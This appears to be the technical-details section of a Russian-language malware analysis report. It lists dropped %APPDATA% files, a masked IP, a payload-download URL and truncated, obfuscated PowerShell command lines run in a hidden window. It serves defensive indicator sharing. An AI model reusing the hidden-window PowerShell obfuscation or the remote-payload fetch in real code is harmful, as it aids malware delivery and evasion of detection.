Техническая информация
- %APPDATA%\bitc1d8.tmp
- %APPDATA%\bit148a.tmp
- %APPDATA%\bitc1d8.tmp
- %APPDATA%\bit148a.tmp
- %APPDATA%\bitc1d8.tmp в %APPDATA%\semiconditioned.rab
- %APPDATA%\bit148a.tmp в %APPDATA%\semiconditioned.rab
- '85.##9.176.46':80
- http://85.##9.176.46/Rabiate.qxd
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "dir;Function Stikpillens9 ($Screenless){$Fiends=5;$Fiends++;For($Cabezone=5; $Cabezone -lt $Screenless.Length-1; $Cabezone+=$Fiends){$Ascophyllum = 'sub' + 'string';$mogote=$Screenless.$Ascop...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "dir;Function Stikpillens9 ($Screenless){$Fiends=5;$Fiends++;For($Cabezone=5; $Cabezone -lt $Screenless.Length-1; $Cabezone+=$Fiends){$Ascophyllum = 'sub' + 'string';$mogote=$Screenless.$Ascop...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "dir;Function Stikpillens9 ($Screenless){$Fiends=5;$Fiends++;For($Cabezone=5; $Cabezone -lt $Screenless.Length-1; $Cabezone+=$Fiends){$Ascophyllum = 'sub' + 'string';$mogote=$Screenless.$Ascop...